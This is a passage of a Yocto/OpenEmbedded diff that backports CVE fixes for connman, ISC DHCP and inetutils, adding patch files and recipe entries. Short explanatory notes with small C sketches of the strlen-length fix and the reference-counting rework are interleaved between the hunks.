+diff --git a/gweb/gweb.c b/gweb/gweb.c
+index 12fcb1d8..13c6c5f2 100644
+--- a/gweb/gweb.c
++++ b/gweb/gweb.c
+@@ -918,7 +918,7 @@ static gboolean received_data(GIOChannel *channel, GIOCondition cond,
+ }
+
+ *pos = '\0';
+- count = strlen((char *) ptr);
++ count = pos - ptr;
+ if (count > 0 && ptr[count - 1] == '\r') {
+ ptr[--count] = '\0';
+ bytes_read--;
+--
+cgit
+
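The one-line change above replaces strlen() with pointer arithmetic from memchr() because the received buffer is binary data: an embedded NUL byte makes strlen() under-count the line and desynchronizes count from bytes_read. A tiny sketch of the difference; the buffer contents are invented:

    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
        /* A "line" as it might arrive off the wire, with an embedded NUL
         * byte before the terminating newline. */
        char buf[] = { 'H', 'T', 'T', 'P', '\0', 'x', 'x', '\n', 'y' };
        size_t bytes_read = sizeof(buf);

        char *pos = memchr(buf, '\n', bytes_read);   /* end of the line */
        if (!pos)
            return 1;
        *pos = '\0';

        size_t count_strlen = strlen(buf);           /* stops at the NUL: 4 */
        size_t count_memchr = (size_t)(pos - buf);   /* true line length: 7 */

        printf("strlen: %zu  memchr: %zu  bytes_read: %zu\n",
               count_strlen, count_memchr, bytes_read);
        return 0;
    }

Any later offset or copy sized with the strlen() value drifts away from bytes_read, which is how the original heap overflow in received_data() came about.
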
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
new file mode 100644
index 0000000000..83a013981c
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
@@ -0,0 +1,266 @@
+From 358a44b1442fae0f82846e10da0708b5c4e1ce27 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 20 Sep 2022 17:58:19 +0530
+Subject: [PATCH] CVE-2022-32293
+
+CVE: CVE-2022-32293
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=72343929836de80727a27d6744c869dff045757c && https://git.kernel.org/pub/scm/network/connman/connman.git/commit/src/wispr.c?id=416bfaff988882c553c672e5bfc2d4f648d29e8a]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/wispr.c | 83 ++++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 63 insertions(+), 20 deletions(-)
+
+diff --git a/src/wispr.c b/src/wispr.c
+index 473c0e0..97e0242 100644
+--- a/src/wispr.c
++++ b/src/wispr.c
+@@ -59,6 +59,7 @@ struct wispr_route {
+ };
+
+ struct connman_wispr_portal_context {
++ int refcount;
+ struct connman_service *service;
+ enum connman_ipconfig_type type;
+ struct connman_wispr_portal *wispr_portal;
+@@ -96,10 +97,13 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data);
+
+ static GHashTable *wispr_portal_list = NULL;
+
++#define wispr_portal_context_ref(wp_context) \
++ wispr_portal_context_ref_debug(wp_context, __FILE__, __LINE__, __func__)
++#define wispr_portal_context_unref(wp_context) \
++ wispr_portal_context_unref_debug(wp_context, __FILE__, __LINE__, __func__)
++
+ static void connman_wispr_message_init(struct connman_wispr_message *msg)
+ {
+- DBG("");
+-
+ msg->has_error = false;
+ msg->current_element = NULL;
+
+@@ -159,11 +163,6 @@ static void free_wispr_routes(struct connman_wispr_portal_context *wp_context)
+ static void free_connman_wispr_portal_context(
+ struct connman_wispr_portal_context *wp_context)
+ {
+- DBG("context %p", wp_context);
+-
+- if (!wp_context)
+- return;
+-
+ if (wp_context->wispr_portal) {
+ if (wp_context->wispr_portal->ipv4_context == wp_context)
+ wp_context->wispr_portal->ipv4_context = NULL;
+@@ -200,9 +199,38 @@ static void free_connman_wispr_portal_context(
+ g_free(wp_context);
+ }
+
++static struct connman_wispr_portal_context *
++wispr_portal_context_ref_debug(struct connman_wispr_portal_context *wp_context,
++ const char *file, int line, const char *caller)
++{
++ DBG("%p ref %d by %s:%d:%s()", wp_context,
++ wp_context->refcount + 1, file, line, caller);
++
++ __sync_fetch_and_add(&wp_context->refcount, 1);
++
++ return wp_context;
++}
++
++static void wispr_portal_context_unref_debug(
++ struct connman_wispr_portal_context *wp_context,
++ const char *file, int line, const char *caller)
++{
++ if (!wp_context)
++ return;
++
++ DBG("%p ref %d by %s:%d:%s()", wp_context,
++ wp_context->refcount - 1, file, line, caller);
++
++ if (__sync_fetch_and_sub(&wp_context->refcount, 1) != 1)
++ return;
++
++ free_connman_wispr_portal_context(wp_context);
++}
++
+ static struct connman_wispr_portal_context *create_wispr_portal_context(void)
+ {
+- return g_try_new0(struct connman_wispr_portal_context, 1);
++ return wispr_portal_context_ref(
++ g_new0(struct connman_wispr_portal_context, 1));
+ }
+
+ static void free_connman_wispr_portal(gpointer data)
+@@ -214,8 +242,8 @@ static void free_connman_wispr_portal(gpointer data)
+ if (!wispr_portal)
+ return;
+
+- free_connman_wispr_portal_context(wispr_portal->ipv4_context);
+- free_connman_wispr_portal_context(wispr_portal->ipv6_context);
++ wispr_portal_context_unref(wispr_portal->ipv4_context);
++ wispr_portal_context_unref(wispr_portal->ipv6_context);
+
+ g_free(wispr_portal);
+ }
+@@ -450,8 +478,6 @@ static void portal_manage_status(GWebResult *result,
+ &str))
+ connman_info("Client-Timezone: %s", str);
+
+- free_connman_wispr_portal_context(wp_context);
+-
+ __connman_service_ipconfig_indicate_state(service,
+ CONNMAN_SERVICE_STATE_ONLINE, type);
+ }
+@@ -509,14 +535,17 @@ static void wispr_portal_request_portal(
+ {
+ DBG("");
+
++ wispr_portal_context_ref(wp_context);
+ wp_context->request_id = g_web_request_get(wp_context->web,
+ wp_context->status_url,
+ wispr_portal_web_result,
+ wispr_route_request,
+ wp_context);
+
+- if (wp_context->request_id == 0)
++ if (wp_context->request_id == 0) {
+ wispr_portal_error(wp_context);
++ wispr_portal_context_unref(wp_context);
++ }
+ }
+
+ static bool wispr_input(const guint8 **data, gsize *length,
+@@ -562,13 +591,15 @@ static void wispr_portal_browser_reply_cb(struct connman_service *service,
+ return;
+
+ if (!authentication_done) {
+- wispr_portal_error(wp_context);
+ free_wispr_routes(wp_context);
++ wispr_portal_error(wp_context);
++ wispr_portal_context_unref(wp_context);
+ return;
+ }
+
+ /* Restarting the test */
+ __connman_service_wispr_start(service, wp_context->type);
++ wispr_portal_context_unref(wp_context);
+ }
+
+ static void wispr_portal_request_wispr_login(struct connman_service *service,
+@@ -592,7 +623,7 @@ static void wispr_portal_request_wispr_login(struct connman_service *service,
+ return;
+ }
+
+- free_connman_wispr_portal_context(wp_context);
++ wispr_portal_context_unref(wp_context);
+ return;
+ }
+
+@@ -644,11 +675,13 @@ static bool wispr_manage_message(GWebResult *result,
+
+ wp_context->wispr_result = CONNMAN_WISPR_RESULT_LOGIN;
+
++ wispr_portal_context_ref(wp_context);
+ if (__connman_agent_request_login_input(wp_context->service,
+ wispr_portal_request_wispr_login,
+- wp_context) != -EINPROGRESS)
++ wp_context) != -EINPROGRESS) {
+ wispr_portal_error(wp_context);
+- else
++ wispr_portal_context_unref(wp_context);
++ } else
+ return true;
+
+ break;
+@@ -697,6 +730,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ if (length > 0) {
+ g_web_parser_feed_data(wp_context->wispr_parser,
+ chunk, length);
++ wispr_portal_context_unref(wp_context);
+ return true;
+ }
+
+@@ -714,6 +748,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+
+ switch (status) {
+ case 000:
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->status_url, wp_context);
+@@ -725,11 +760,14 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ if (g_web_result_get_header(result, "X-ConnMan-Status",
+ &str)) {
+ portal_manage_status(result, wp_context);
++ wispr_portal_context_unref(wp_context);
+ return false;
+- } else
++ } else {
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->redirect_url, wp_context);
++ }
+
+ break;
+ case 302:
+@@ -737,6 +775,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ !g_web_result_get_header(result, "Location",
+ &redirect)) {
+
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->status_url, wp_context);
+@@ -747,6 +786,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+
+ wp_context->redirect_url = g_strdup(redirect);
+
++ wispr_portal_context_ref(wp_context);
+ wp_context->request_id = g_web_request_get(wp_context->web,
+ redirect, wispr_portal_web_result,
+ wispr_route_request, wp_context);
+@@ -763,6 +803,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+
+ break;
+ case 505:
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->status_url, wp_context);
+@@ -775,6 +816,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ wp_context->request_id = 0;
+ done:
+ wp_context->wispr_msg.message_type = -1;
++ wispr_portal_context_unref(wp_context);
+ return false;
+ }
+
+@@ -809,6 +851,7 @@ static void proxy_callback(const char *proxy, void *user_data)
+ xml_wispr_parser_callback, wp_context);
+
+ wispr_portal_request_portal(wp_context);
++ wispr_portal_context_unref(wp_context);
+ }
+
+ static gboolean no_proxy_callback(gpointer user_data)
+@@ -903,7 +946,7 @@ static int wispr_portal_detect(struct connman_wispr_portal_context *wp_context)
+
+ if (wp_context->token == 0) {
+ err = -EINVAL;
+- free_connman_wispr_portal_context(wp_context);
++ wispr_portal_context_unref(wp_context);
+ }
+ } else if (wp_context->timeout == 0) {
+ wp_context->timeout = g_idle_add(no_proxy_callback, wp_context);
+@@ -952,7 +995,7 @@ int __connman_wispr_start(struct connman_service *service,
+
+ /* If there is already an existing context, we wipe it */
+ if (wp_context)
+- free_connman_wispr_portal_context(wp_context);
++ wispr_portal_context_unref(wp_context);
+
+ wp_context = create_wispr_portal_context();
+ if (!wp_context)
+--
+2.25.1
+
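The wispr rework above converts ad-hoc free_connman_wispr_portal_context() calls into reference counting, so a context shared by several in-flight web requests and agent callbacks is freed exactly once, when the last user drops it. A minimal sketch of the same pattern with the same __sync builtins; the struct fields are invented:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    struct context {
        int refcount;
        char *url;
    };

    static struct context *context_ref(struct context *ctx)
    {
        __sync_fetch_and_add(&ctx->refcount, 1);
        return ctx;
    }

    static void context_unref(struct context *ctx)
    {
        if (!ctx)
            return;
        /* Free only when the count drops from 1 to 0. */
        if (__sync_fetch_and_sub(&ctx->refcount, 1) != 1)
            return;
        free(ctx->url);
        free(ctx);
    }

    static struct context *context_new(const char *url)
    {
        struct context *ctx = calloc(1, sizeof(*ctx));

        if (!ctx)
            return NULL;
        ctx->url = strdup(url);
        if (!ctx->url) {
            free(ctx);
            return NULL;
        }
        return context_ref(ctx);      /* the caller owns the first reference */
    }

    int main(void)
    {
        struct context *ctx = context_new("http://example.invalid/status");
        struct context *held;

        if (!ctx)
            return 1;
        held = context_ref(ctx);      /* a pending request takes its own ref */
        context_unref(ctx);           /* owner drops its ref: still alive */
        printf("still usable: %s\n", held->url);
        context_unref(held);          /* last reference: actually freed */
        return 0;
    }

Every asynchronous path that stores the pointer takes a reference before handing it off and drops it in its callback, which is the discipline the patch imposes on the request, login and browser paths.
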
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch b/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch
new file mode 100644
index 0000000000..ea1601cc04
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch
@@ -0,0 +1,54 @@
+From 99e2c16ea1cced34a5dc450d76287a1c3e762138 Mon Sep 17 00:00:00 2001
+From: Daniel Wagner <wagi@monom.org>
+Date: Tue, 11 Apr 2023 08:12:56 +0200
+Subject: gdhcp: Verify and sanitize packet length first
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/patch/?id=99e2c16ea1cced34a5dc450d76287a1c3e762138]
+CVE: CVE-2023-28488
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ gdhcp/client.c | 16 +++++++++-------
+ 1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 7efa7e45..82017692 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -1319,9 +1319,9 @@ static bool sanity_check(struct ip_udp_dhcp_packet *packet, int bytes)
+ static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
+ struct sockaddr_in *dst_addr)
+ {
+- int bytes;
+ struct ip_udp_dhcp_packet packet;
+ uint16_t check;
++ int bytes, tot_len;
+
+ memset(&packet, 0, sizeof(packet));
+
+@@ -1329,15 +1329,17 @@ static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
+ if (bytes < 0)
+ return -1;
+
+- if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
+- return -1;
+-
+- if (bytes < ntohs(packet.ip.tot_len))
++ tot_len = ntohs(packet.ip.tot_len);
++ if (bytes > tot_len) {
++ /* ignore any extra garbage bytes */
++ bytes = tot_len;
++ } else if (bytes < tot_len) {
+ /* packet is bigger than sizeof(packet), we did partial read */
+ return -1;
++ }
+
+- /* ignore any extra garbage bytes */
+- bytes = ntohs(packet.ip.tot_len);
++ if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
++ return -1;
+
+ if (!sanity_check(&packet, bytes))
+ return -1;
+--
+cgit
+
diff --git a/meta/recipes-connectivity/connman/connman_1.37.bb b/meta/recipes-connectivity/connman/connman_1.37.bb
index 00852bf0d6..8062a094d3 100644
--- a/meta/recipes-connectivity/connman/connman_1.37.bb
+++ b/meta/recipes-connectivity/connman/connman_1.37.bb
@@ -6,6 +6,15 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/network/${BPN}/${BP}.tar.xz \
file://0001-gweb-fix-segfault-with-musl-v1.1.21.patch \
file://connman \
file://no-version-scripts.patch \
+ file://CVE-2021-26675.patch \
+ file://CVE-2021-26676-0001.patch \
+ file://CVE-2021-26676-0002.patch \
+ file://CVE-2021-33833.patch \
+ file://CVE-2022-23096-7.patch \
+ file://CVE-2022-23098.patch \
+ file://CVE-2022-32292.patch \
+ file://CVE-2022-32293.patch \
+ file://CVE-2023-28488.patch \
"
SRC_URI_append_libc-musl = " file://0002-resolve-musl-does-not-implement-res_ninit.patch"
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch
new file mode 100644
index 0000000000..91aaf83a77
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch
@@ -0,0 +1,66 @@
+From 5a7344b05081d84343a1627e47478f3990b17700 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 8 Jul 2021 00:08:25 +0000
+Subject: [PATCH] ISC has disclosed a vulnerability in ISC DHCP
+ (CVE-2021-25217)
+
+On May 26, 2021, we (Internet Systems Consortium) disclosed a
+vulnerability affecting our ISC DHCP software:
+
+ CVE-2021-25217: A buffer overrun in lease file parsing code can be
+ used to exploit a common vulnerability shared by dhcpd and dhclient
+ https://kb.isc.org/docs/cve-2021-25217
+
+New versions of ISC DHCP are available from https://www.isc.org/downloads
+
+Operators and package maintainers who prefer to apply patches selectively can
+find individual vulnerability-specific patches in the "patches" subdirectory
+of the release directories for our two stable release branches (4.4 and 4.1-ESV)
+
+ https://downloads.isc.org/isc/dhcp/4.4.2-P1/patches
+ https://downloads.isc.org/isc/dhcp/4.1-ESV-R16-P1/patches
+
+With the public announcement of this vulnerability, the embargo
+period is ended and any updated software packages that have been
+prepared may be released.
+
+Upstream-Status: Accepted [https://www.openwall.com/lists/oss-security/2021/05/26/6]
+CVE: CVE-2021-25217
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ common/parse.c | 7 ++++---
+ 1 file changed, 4 insertions(+), 3 deletions(-)
+
+diff --git a/common/parse.c b/common/parse.c
+index 386a632..fc7b39c 100644
+--- a/common/parse.c
++++ b/common/parse.c
+@@ -3,7 +3,7 @@
+ Common parser code for dhcpd and dhclient. */
+
+ /*
+- * Copyright (c) 2004-2019 by Internet Systems Consortium, Inc. ("ISC")
++ * Copyright (c) 2004-2021 by Internet Systems Consortium, Inc. ("ISC")
+ * Copyright (c) 1995-2003 by Internet Software Consortium
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+@@ -5556,13 +5556,14 @@ int parse_X (cfile, buf, max)
+ skip_to_semi (cfile);
+ return 0;
+ }
+- convert_num (cfile, &buf [len], val, 16, 8);
+- if (len++ > max) {
++ if (len >= max) {
+ parse_warn (cfile,
+ "hexadecimal constant too long.");
+ skip_to_semi (cfile);
+ return 0;
+ }
++ convert_num (cfile, &buf [len], val, 16, 8);
++ len++;
+ token = peek_token (&val, (unsigned *)0, cfile);
+ if (token == COLON)
+ token = next_token (&val,
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch
new file mode 100644
index 0000000000..11f162cbda
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch
@@ -0,0 +1,120 @@
+From 8a5d739eea10ee6e193f053b1662142d5657cbc6 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 6 Oct 2022 09:39:18 +0530
+Subject: [PATCH] CVE-2022-2928
+
+Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
+CVE: CVE-2022-2928
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common/options.c | 7 +++++
+ common/tests/option_unittest.c | 54 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 61 insertions(+)
+
+diff --git a/common/options.c b/common/options.c
+index a7ed84c..4e53bb4 100644
+--- a/common/options.c
++++ b/common/options.c
+@@ -4452,6 +4452,8 @@ add_option(struct option_state *options,
+ if (!option_cache_allocate(&oc, MDL)) {
+ log_error("No memory for option cache adding %s (option %d).",
+ option->name, option_num);
++ /* Get rid of reference created during hash lookup. */
++ option_dereference(&option, MDL);
+ return 0;
+ }
+
+@@ -4463,6 +4465,8 @@ add_option(struct option_state *options,
+ MDL)) {
+ log_error("No memory for constant data adding %s (option %d).",
+ option->name, option_num);
++ /* Get rid of reference created during hash lookup. */
++ option_dereference(&option, MDL);
+ option_cache_dereference(&oc, MDL);
+ return 0;
+ }
+@@ -4471,6 +4475,9 @@ add_option(struct option_state *options,
+ save_option(&dhcp_universe, options, oc);
+ option_cache_dereference(&oc, MDL);
+
++ /* Get rid of reference created during hash lookup. */
++ option_dereference(&option, MDL);
++
+ return 1;
+ }
+
+diff --git a/common/tests/option_unittest.c b/common/tests/option_unittest.c
+index cd52cfb..690704d 100644
+--- a/common/tests/option_unittest.c
++++ b/common/tests/option_unittest.c
+@@ -130,6 +130,59 @@ ATF_TC_BODY(pretty_print_option, tc)
+ }
+
+
++ATF_TC(add_option_ref_cnt);
++
++ATF_TC_HEAD(add_option_ref_cnt, tc)
++{
++ atf_tc_set_md_var(tc, "descr",
++ "Verify add_option() does not leak option ref counts.");
++}
++
++ATF_TC_BODY(add_option_ref_cnt, tc)
++{
++ struct option_state *options = NULL;
++ struct option *option = NULL;
++ unsigned int cid_code = DHO_DHCP_CLIENT_IDENTIFIER;
++ char *cid_str = "1234";
++ int refcnt_before = 0;
++
++ // Look up the option we're going to add.
++ initialize_common_option_spaces();
++ if (!option_code_hash_lookup(&option, dhcp_universe.code_hash,
++ &cid_code, 0, MDL)) {
++ atf_tc_fail("cannot find option definition?");
++ }
++
++ // Get the option's reference count before we call add_options.
++ refcnt_before = option->refcnt;
++
++ // Allocate an option_state to which to add an option.
++ if (!option_state_allocate(&options, MDL)) {
++ atf_tc_fail("cannot allocat options state");
++ }
++
++ // Call add_option() to add the option to the option state.
++ if (!add_option(options, cid_code, cid_str, strlen(cid_str))) {
++ atf_tc_fail("add_option returned 0");
++ }
++
++ // Verify that calling add_option() only adds 1 to the option ref count.
++ if (option->refcnt != (refcnt_before + 1)) {
++ atf_tc_fail("after add_option(), count is wrong, before %d, after: %d",
++ refcnt_before, option->refcnt);
++ }
++
++ // Dereference the option_state; this should reduce the ref count to
++ // its starting value.
++ option_state_dereference(&options, MDL);
++
++ // Verify that dereferencing option_state restores option ref count.
++ if (option->refcnt != refcnt_before) {
++ atf_tc_fail("after state deref, count is wrong, before %d, after: %d",
++ refcnt_before, option->refcnt);
++ }
++}
++
+ /* This macro defines main() method that will call specified
+ test cases. tp and simple_test_case names can be whatever you want
+ as long as it is a valid variable identifier. */
+@@ -137,6 +190,7 @@ ATF_TP_ADD_TCS(tp)
+ {
+ ATF_TP_ADD_TC(tp, option_refcnt);
+ ATF_TP_ADD_TC(tp, pretty_print_option);
++ ATF_TP_ADD_TC(tp, add_option_ref_cnt);
+
+ return (atf_no_error());
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch
new file mode 100644
index 0000000000..d605204f89
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch
@@ -0,0 +1,40 @@
+From 5c959166ebee7605e2048de573f2475b4d731ff7 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 6 Oct 2022 09:42:59 +0530
+Subject: [PATCH] CVE-2022-2929
+
+Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
+CVE: CVE-2022-2929
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common/options.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/common/options.c b/common/options.c
+index 4e53bb4..28800fc 100644
+--- a/common/options.c
++++ b/common/options.c
+@@ -454,16 +454,16 @@ int fqdn_universe_decode (struct option_state *options,
+ while (s < &bp -> data[0] + length + 2) {
+ len = *s;
+ if (len > 63) {
+- log_info ("fancy bits in fqdn option");
+- return 0;
++ log_info ("label length exceeds 63 in fqdn option");
++ goto bad;
+ }
+ if (len == 0) {
+ terminated = 1;
+ break;
+ }
+ if (s + len > &bp -> data [0] + length + 3) {
+- log_info ("fqdn tag longer than buffer");
+- return 0;
++ log_info ("fqdn label longer than buffer");
++ goto bad;
+ }
+
+ if (first_len == 0) {
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb b/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
index b56a204821..d3c87d0d07 100644
--- a/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
+++ b/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
@@ -10,6 +10,9 @@ SRC_URI += "file://0001-define-macro-_PATH_DHCPD_CONF-and-_PATH_DHCLIENT_CON.pat
file://0012-dhcp-correct-the-intention-for-xml2-lib-search.patch \
file://0013-fixup_use_libbind.patch \
file://0001-workaround-busybox-limitation-in-linux-dhclient-script.patch \
+ file://CVE-2021-25217.patch \
+ file://CVE-2022-2928.patch \
+ file://CVE-2022-2929.patch \
"
SRC_URI[md5sum] = "2afdaf8498dc1edaf3012efdd589b3e1"
diff --git a/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch b/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
new file mode 100644
index 0000000000..aea07bd803
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
@@ -0,0 +1,283 @@
+From 703418fe9d2e3b1e8d594df5788d8001a8116265 Mon Sep 17 00:00:00 2001
+From: Jeffrey Bencteux <jeffbencteux@gmail.com>
+Date: Fri, 30 Jun 2023 19:02:45 +0200
+Subject: [PATCH] CVE-2023-40303: ftpd,rcp,rlogin,rsh,rshd,uucpd: fix: check
+ set*id() return values
+
+Several setuid(), setgid(), seteuid() and setegid() return values
+were not checked in the ftpd/rcp/rlogin/rsh/rshd/uucpd code, potentially
+leading to security issues.
+
+CVE: CVE-2023-40303
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=e4e65c03f4c11292a3e40ef72ca3f194c8bffdd6]
+Signed-off-by: Jeffrey Bencteux <jeffbencteux@gmail.com>
+Signed-off-by: Simon Josefsson <simon@josefsson.org>
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ftpd/ftpd.c | 10 +++++++---
+ src/rcp.c | 39 +++++++++++++++++++++++++++++++++------
+ src/rlogin.c | 11 +++++++++--
+ src/rsh.c | 25 +++++++++++++++++++++----
+ src/rshd.c | 20 +++++++++++++++++---
+ src/uucpd.c | 15 +++++++++++++--
+ 6 files changed, 100 insertions(+), 20 deletions(-)
+
+diff --git a/ftpd/ftpd.c b/ftpd/ftpd.c
+index 5db88d0..b52b122 100644
+--- a/ftpd/ftpd.c
++++ b/ftpd/ftpd.c
+@@ -862,7 +862,9 @@ end_login (struct credentials *pcred)
+ char *remotehost = pcred->remotehost;
+ int atype = pcred->auth_type;
+
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
++
+ if (pcred->logged_in)
+ {
+ logwtmp_keep_open (ttyline, "", "");
+@@ -1151,7 +1153,8 @@ getdatasock (const char *mode)
+
+ if (data >= 0)
+ return fdopen (data, mode);
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
+ s = socket (ctrl_addr.ss_family, SOCK_STREAM, 0);
+ if (s < 0)
+ goto bad;
+@@ -1978,7 +1981,8 @@ passive (int epsv, int af)
+ else /* !AF_INET6 */
+ ((struct sockaddr_in *) &pasv_addr)->sin_port = 0;
+
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
+ if (bind (pdata, (struct sockaddr *) &pasv_addr, pasv_addrlen) < 0)
+ {
+ if (seteuid ((uid_t) cred.uid))
+diff --git a/src/rcp.c b/src/rcp.c
+index bafa35f..366295c 100644
+--- a/src/rcp.c
++++ b/src/rcp.c
+@@ -347,14 +347,23 @@ main (int argc, char *argv[])
+ if (from_option)
+ { /* Follow "protocol", send data. */
+ response ();
+- setuid (userid);
++
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ source (argc, argv);
+ exit (errs);
+ }
+
+ if (to_option)
+ { /* Receive data. */
+- setuid (userid);
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ sink (argc, argv);
+ exit (errs);
+ }
+@@ -539,7 +548,11 @@ toremote (char *targ, int argc, char *argv[])
+ if (response () < 0)
+ exit (EXIT_FAILURE);
+ free (bp);
+- setuid (userid);
++
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+ }
+ source (1, argv + i);
+ close (rem);
+@@ -634,7 +647,12 @@ tolocal (int argc, char *argv[])
+ ++errs;
+ continue;
+ }
+- seteuid (userid);
++
++ if (seteuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
+ #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
+ sslen = sizeof (ss);
+ (void) getpeername (rem, (struct sockaddr *) &ss, &sslen);
+@@ -647,7 +665,12 @@ tolocal (int argc, char *argv[])
+ #endif
+ vect[0] = target;
+ sink (1, vect);
+- seteuid (effuid);
++
++ if (seteuid (effuid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
+ close (rem);
+ rem = -1;
+ #ifdef SHISHI
+@@ -1453,7 +1476,11 @@ susystem (char *s, int userid)
+ return (127);
+
+ case 0:
+- setuid (userid);
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ execl (PATH_BSHELL, "sh", "-c", s, NULL);
+ _exit (127);
+ }
+diff --git a/src/rlogin.c b/src/rlogin.c
+index e5e11a7..6b38901 100644
+--- a/src/rlogin.c
++++ b/src/rlogin.c
+@@ -649,8 +649,15 @@ try_connect:
+ /* Now change to the real user ID. We have to be set-user-ID root
+ to get the privileged port that rcmd () uses. We now want, however,
+ to run as the real user who invoked us. */
+- seteuid (uid);
+- setuid (uid);
++ if (seteuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
++ if (setuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+
+ doit (&osmask); /* The old mask will activate SIGURG and SIGUSR1! */
+
+diff --git a/src/rsh.c b/src/rsh.c
+index bd70372..b451a70 100644
